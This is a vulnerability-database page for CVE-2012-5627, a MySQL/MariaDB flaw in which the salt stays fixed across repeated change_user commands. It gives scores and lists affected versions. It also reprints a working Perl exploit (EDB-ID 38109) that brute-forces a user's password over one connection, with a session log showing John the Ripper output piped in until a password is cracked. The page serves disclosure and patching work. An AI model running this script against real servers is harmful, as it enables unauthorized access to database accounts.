CVE-2012-5627
Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Oracle MySQL and MariaDB 5.5.x before 5.5.29, 5.3.x before 5.3.12, and 5.2.x before 5.2.14 does not modify the salt during multiple executions of the change_user command within the same connection which makes it easier for remote authenticated users to conduct brute force password guessing attacks.
CVE Informations
Related Weaknesses
| Weakness Name | Source | |
|---|---|---|
| Insufficiently Protected Credentials The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval. |
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 4 | AV:N/AC:L/Au:S/C:P/I:N/A:N | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 38109
Publication date : 2012-12-05 23h00 +00:00
Author : kingcope
EDB Verified : Yes
source: https://www.securityfocus.com/bid/56837/info
MySQL and MariaDB are prone to a security-bypass weakness.
An attacker may be able to exploit this issue to aid in brute-force attacks; other attacks may also be possible.
use Net::MySQL;
$|=1;
my $mysql = Net::MySQL->new(
hostname => '192.168.2.3',
database => 'test',
user => "user",
password => "secret",
debug => 0,
);
$crackuser = "crackme";
while(<stdin>) {
chomp;
$currentpass = $_;
$vv = join "\0",
$crackuser,
"\x14".
Net::MySQL::Password->scramble(
$currentpass, $mysql->{salt}, $mysql->{client_capabilities}
) . "\0";
if ($mysql->_execute_command("\x11", $vv) ne undef) {
print "[*] Cracked! --> $currentpass\n";
exit;
}
}
---
example session:
C:\Users\kingcope\Desktop>C:\Users\kingcope\Desktop\john179\run\jo
hn --incremental --stdout=5 | perl mysqlcrack.pl
Warning: MaxLen = 8 is too large for the current hash type, reduced to 5
words: 16382 time: 0:00:00:02 w/s: 6262 current: citcH
words: 24573 time: 0:00:00:04 w/s: 4916 current: rap
words: 40956 time: 0:00:00:07 w/s: 5498 current: matc3
words: 49147 time: 0:00:00:09 w/s: 5030 current: 4429
words: 65530 time: 0:00:00:12 w/s: 5354 current: ch141
words: 73721 time: 0:00:00:14 w/s: 5021 current: v3n
words: 90104 time: 0:00:00:17 w/s: 5277 current: pun2
[*] Cracked! --> pass
words: 98295 time: 0:00:00:18 w/s: 5434 current: 43gs
Session aborted
Products Mentioned
Configuraton 0
Oracle>>Mysql >> Version From (including) 5.5.0 To (excluding) 5.5.29
- Oracle>>Mysql >> Version 5.5.0 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.1 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.2 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.3 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.4 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.5 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.6 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.7 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.8 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.9 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.10 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.11 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.12 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.13 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.14 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.15 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.16 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.17 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.18 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.19 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.20 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.21 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.22 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.23 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.24 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.25 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.25 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.26 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.27 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.28 (Open CPE detail)
Configuraton 0
Mariadb>>Mariadb >> Version From (including) 5.2.0 To (excluding) 5.2.14
- Mariadb>>Mariadb >> Version 5.2.0 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.2.1 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.2.2 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.2.3 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.2.4 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.2.5 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.2.6 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.2.7 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.2.8 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.2.9 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.2.10 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.2.11 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.2.12 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.2.13 (Open CPE detail)
Mariadb>>Mariadb >> Version From (including) 5.3.0 To (excluding) 5.3.12
- Mariadb>>Mariadb >> Version 5.3.0 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.3.1 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.3.2 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.3.3 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.3.4 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.3.5 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.3.6 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.3.7 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.3.8 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.3.9 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.3.10 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.3.11 (Open CPE detail)
Mariadb>>Mariadb >> Version From (including) 5.5.0 To (excluding) 5.5.29
- Mariadb>>Mariadb >> Version 5.5.0 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.5.20 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.5.21 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.5.22 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.5.23 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.5.24 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.5.25 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.5.27 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.5.28 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.5.28a (Open CPE detail)
Mariadb>>Mariadb >> Version 10.0.0
- Mariadb>>Mariadb >> Version 10.0.0 (Open CPE detail)
References
http://www.mandriva.com/security/advisories?name=MDVSA-2013:102
Tags : vendor-advisory, x_refsource_MANDRIVA
Tags : vendor-advisory, x_refsource_MANDRIVA
